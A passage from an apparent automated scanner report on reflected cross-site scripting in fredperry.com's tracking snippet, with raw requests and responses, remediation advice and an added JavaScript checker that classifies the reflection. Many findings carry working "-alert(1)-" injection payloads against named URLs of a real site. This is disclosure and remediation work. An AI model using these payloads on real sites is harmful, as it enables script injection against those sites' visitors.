The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e6261"-alert(1)-"b4c4364b0e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where that is unavoidable, the value must be emitted as a JavaScript string literal with the quote, backslash, <, >, &, / and line-terminator characters written as \xHH or \uHHHH escapes; HTML entity encoding is the wrong encoding for this context. In this case the echoed value is the raw request URI passed to _trackPageview; the ga.js tracker records the current document location when that argument is omitted, so dropping the argument removes the server-side concatenation entirely. The findings in this report that reflect through this _trackPageview call share one sink, so a single template change addresses them together.

Request

GET /limited-edition/women/collaboration/?e6261"-alert(1)-"b4c4364b0e=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:13:47 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=irnsq15v08g7ekuep3cnvd35d0; expires=Tue, 09-Nov-2010 17:13:47 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29373

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/women/collaboration/?e6261"-alert(1)-"b4c4364b0e=1");
//]]>
...[SNIP]...
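Finding 1.161 shows the same reflection on a 404 page: the tracker snippet is part of the site-wide template, so the sink is reachable from any path, existing or not. The report marks each finding "Certain" because the scanner's quote survived unmodified inside the double-quoted literal. The following is an added example, not code from the Hoyt LLC report or from fredperry.com, that re-runs that check over a captured response body and classifies the context, and also builds the request-target a browser would actually send: the report's request lines carry a raw " in the path and query, but current browsers percent-encode that character, so a link-delivered attack only works if the server decodes %22 before echoing, which the report does not test. The sample bodies are constructed from the 404 response excerpt in 1.161; the function names are assumptions.

```javascript
// Added example; not code from the Hoyt LLC report or from fredperry.com.
// Re-checks a captured response for the reflection described in findings
// 1.153 to 1.168 and classifies the context. SAMPLE_404 is constructed from
// the response excerpt in finding 1.161; SAMPLE_ESCAPED is a constructed
// "what a fixed page would look like" and is not from the report.

// Constructed from the 404 response in finding 1.161.
const SAMPLE_404 = [
  '<title> 404 Not',
  '<![CDATA[',
  'var pageTracker = _gat._getTracker("UA-10227276-1");',
  'pageTracker._trackPageview("/limited-edition/women/collaboration/?e6261"-alert(1)-"b4c4364b0e=1");',
  '//]]>',
].join('\n');

// The same page as it would look if the quote were escaped (constructed).
const SAMPLE_ESCAPED = SAMPLE_404.replace(
  '?e6261"-alert(1)-"b4c4364b0e=1"',
  '?e6261\\"-alert(1)-\\"b4c4364b0e=1"');

// Return the raw argument text of every _trackPageview(...) call. The lazy
// match stops at the first ");", which is sufficient for the report's payloads.
function trackPageviewArgs(body) {
  const out = [];
  const re = /_trackPageview\(([\s\S]*?)\);/g;
  let m;
  while ((m = re.exec(body)) !== null) out.push(m[1]);
  return out;
}

// Classify how the text between the scanner's prefix and suffix markers
// landed inside the argument:
//   'breakout': an unescaped " from the payload sits inside the double-quoted
//               literal, so the literal is terminated and code follows it
//   'escaped' : the quote arrived as \", %22 or &quot; (literal intact)
//   'stripped': markers present but the quote itself was removed
//   'absent'  : the markers do not appear in any _trackPageview argument
function classifyReflection(body, prefix, suffix) {
  for (const arg of trackPageviewArgs(body)) {
    const i = arg.indexOf(prefix);
    const j = arg.indexOf(suffix, i + prefix.length);
    if (i < 0 || j < 0) continue;
    const between = arg.slice(i + prefix.length, j);
    if (/(^|[^\\])"/.test(between)) return 'breakout';
    if (/\\"|%22|&quot;/.test(between)) return 'escaped';
    return 'stripped';
  }
  return 'absent';
}

// Build the request-target a browser sends for a link containing the payload:
// space, ", < and > are percent-encoded by the browser, so the re-test must
// show whether the server decodes %22 before echoing.
function browserRequestTarget(uri) {
  return uri.replace(/[ "<>]/g, (c) =>
    '%' + c.charCodeAt(0).toString(16).toUpperCase().padStart(2, '0'));
}

function demo() {
  const report = classifyReflection(SAMPLE_404, 'e6261', 'b4c4364b0e');
  const fixed = classifyReflection(SAMPLE_ESCAPED, 'e6261', 'b4c4364b0e');
  console.log('report sample :', report);
  console.log('escaped sample:', fixed);
  console.log('re-test target:', browserRequestTarget(
    '/limited-edition/women/collaboration/?e6261"-alert(1)-"b4c4364b0e=1'));
  return { report, fixed };
}

if (typeof require !== 'undefined' && require.main === module) {
  demo();
}
```

classifyReflection works on a saved response body, so it can be pointed at the output of a re-test with the percent-encoded target as easily as at the report's own excerpt; a 'breakout' verdict on the encoded re-test is what turns "the scanner could trigger it" into "a victim's browser can trigger it".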

1.162. http://www.fredperry.com/limited-edition/women/dresses/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/dresses/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 73620"-alert(1)-"1ba7f11b9ac was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where that is unavoidable, the value must be emitted as a JavaScript string literal with the quote, backslash, <, >, &, / and line-terminator characters written as \xHH or \uHHHH escapes; HTML entity encoding is the wrong encoding for this context. In this case the echoed value is the raw request URI passed to _trackPageview; the ga.js tracker records the current document location when that argument is omitted, so dropping the argument removes the server-side concatenation entirely. The findings in this report that reflect through this _trackPageview call share one sink, so a single template change addresses them together.

Request

GET /limited-edition73620"-alert(1)-"1ba7f11b9ac/women/dresses/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:20:09 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=e8intv2rp1hb9gkg85kl8uqgk0; expires=Tue, 09-Nov-2010 17:20:09 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29365

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition73620"-alert(1)-"1ba7f11b9ac/women/dresses/");
//]]>
...[SNIP]...

1.163. http://www.fredperry.com/limited-edition/women/dresses/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/dresses/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 83d54"-alert(1)-"bb802bcf9bd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where that is unavoidable, the value must be emitted as a JavaScript string literal with the quote, backslash, <, >, &, / and line-terminator characters written as \xHH or \uHHHH escapes; HTML entity encoding is the wrong encoding for this context. In this case the echoed value is the raw request URI passed to _trackPageview; the ga.js tracker records the current document location when that argument is omitted, so dropping the argument removes the server-side concatenation entirely. The findings in this report that reflect through this _trackPageview call share one sink, so a single template change addresses them together.

Request

GET /limited-edition/women83d54"-alert(1)-"bb802bcf9bd/dresses/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:20:32 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=4a96726nvsami438drr4261mh2; expires=Tue, 09-Nov-2010 17:20:32 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29365

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/women83d54"-alert(1)-"bb802bcf9bd/dresses/");
//]]>
...[SNIP]...

1.164. http://www.fredperry.com/limited-edition/women/dresses/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/dresses/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a5799"-alert(1)-"22e462446fd was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where that is unavoidable, the value must be emitted as a JavaScript string literal with the quote, backslash, <, >, &, / and line-terminator characters written as \xHH or \uHHHH escapes; HTML entity encoding is the wrong encoding for this context. In this case the echoed value is the raw request URI passed to _trackPageview; the ga.js tracker records the current document location when that argument is omitted, so dropping the argument removes the server-side concatenation entirely. The findings in this report that reflect through this _trackPageview call share one sink, so a single template change addresses them together.

Request

GET /limited-edition/women/dressesa5799"-alert(1)-"22e462446fd/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:20:55 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=rj7h8t5kopnlu85l3vbk8n3pk5; expires=Tue, 09-Nov-2010 17:20:55 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29365

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/women/dressesa5799"-alert(1)-"22e462446fd/");
//]]>
...[SNIP]...

1.165. http://www.fredperry.com/limited-edition/women/dresses/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/dresses/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d8e44"-alert(1)-"7e71feb7166 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where that is unavoidable, the value must be emitted as a JavaScript string literal with the quote, backslash, <, >, &, / and line-terminator characters written as \xHH or \uHHHH escapes; HTML entity encoding is the wrong encoding for this context. In this case the echoed value is the raw request URI passed to _trackPageview; the ga.js tracker records the current document location when that argument is omitted, so dropping the argument removes the server-side concatenation entirely. The findings in this report that reflect through this _trackPageview call share one sink, so a single template change addresses them together.

Request

GET /limited-edition/women/dresses/?d8e44"-alert(1)-"7e71feb7166=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:18:46 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=fn2asjnfshrcqtg8d3famvtbs0; expires=Tue, 09-Nov-2010 17:18:46 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 39093

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Fred Pe
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/women/dresses/?d8e44"-alert(1)-"7e71feb7166=1");
//]]>
...[SNIP]...

1.166. http://www.fredperry.com/limited-edition/women/footwear/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/footwear/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 75686"-alert(1)-"b840be228ba was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where that is unavoidable, the value must be emitted as a JavaScript string literal with the quote, backslash, <, >, &, / and line-terminator characters written as \xHH or \uHHHH escapes; HTML entity encoding is the wrong encoding for this context. In this case the echoed value is the raw request URI passed to _trackPageview; the ga.js tracker records the current document location when that argument is omitted, so dropping the argument removes the server-side concatenation entirely. The findings in this report that reflect through this _trackPageview call share one sink, so a single template change addresses them together.

Request

GET /limited-edition75686"-alert(1)-"b840be228ba/women/footwear/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:20:39 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=16bb9ig1cuv3q2ccnvs9bm93m3; expires=Tue, 09-Nov-2010 17:20:39 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29366

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition75686"-alert(1)-"b840be228ba/women/footwear/");
//]]>
...[SNIP]...

1.167. http://www.fredperry.com/limited-edition/women/footwear/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/footwear/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3c221"-alert(1)-"9b1cf35f8d5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where that is unavoidable, the value must be emitted as a JavaScript string literal with the quote, backslash, <, >, &, / and line-terminator characters written as \xHH or \uHHHH escapes; HTML entity encoding is the wrong encoding for this context. In this case the echoed value is the raw request URI passed to _trackPageview; the ga.js tracker records the current document location when that argument is omitted, so dropping the argument removes the server-side concatenation entirely. The findings in this report that reflect through this _trackPageview call share one sink, so a single template change addresses them together.

Request

GET /limited-edition/women3c221"-alert(1)-"9b1cf35f8d5/footwear/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:21:09 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=s1avt2mbji989ud1j2vrglcht3; expires=Tue, 09-Nov-2010 17:21:09 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29366

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/women3c221"-alert(1)-"9b1cf35f8d5/footwear/");
//]]>
...[SNIP]...

1.168. http://www.fredperry.com/limited-edition/women/footwear/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/footwear/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dd092"-alert(1)-"6094c8a7c78 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/women/footweardd092"-alert(1)-"6094c8a7c78/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:21:42 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=b6lhr50bikil4piqe70n3448r3; expires=Tue, 09-Nov-2010 17:21:42 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29366

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/women/footweardd092"-alert(1)-"6094c8a7c78/");
//]]>
...[SNIP]...

1.169. http://www.fredperry.com/limited-edition/women/footwear/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/footwear/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a8f77"-alert(1)-"856a7d4a239 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/women/footwear/?a8f77"-alert(1)-"856a7d4a239=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:19:04 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=c7hjustpjqjnfs7q23teruvc77; expires=Tue, 09-Nov-2010 17:19:04 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 34872

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Fred Pe
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/women/footwear/?a8f77"-alert(1)-"856a7d4a239=1");
//]]>
...[SNIP]...

1.170. http://www.fredperry.com/limited-edition/women/jackets/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/jackets/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d714e"-alert(1)-"dad4174515e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-editiond714e"-alert(1)-"dad4174515e/women/jackets/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:21:10 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=i1pbkcdgphrua32fu64cjtdjc7; expires=Tue, 09-Nov-2010 17:21:10 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29365

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-editiond714e"-alert(1)-"dad4174515e/women/jackets/");
//]]>
...[SNIP]...

1.171. http://www.fredperry.com/limited-edition/women/jackets/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/jackets/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f9b08"-alert(1)-"a3170872b3d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/womenf9b08"-alert(1)-"a3170872b3d/jackets/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:21:27 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=7b7avsnog7a4k03461pv6n16t4; expires=Tue, 09-Nov-2010 17:21:27 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29365

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
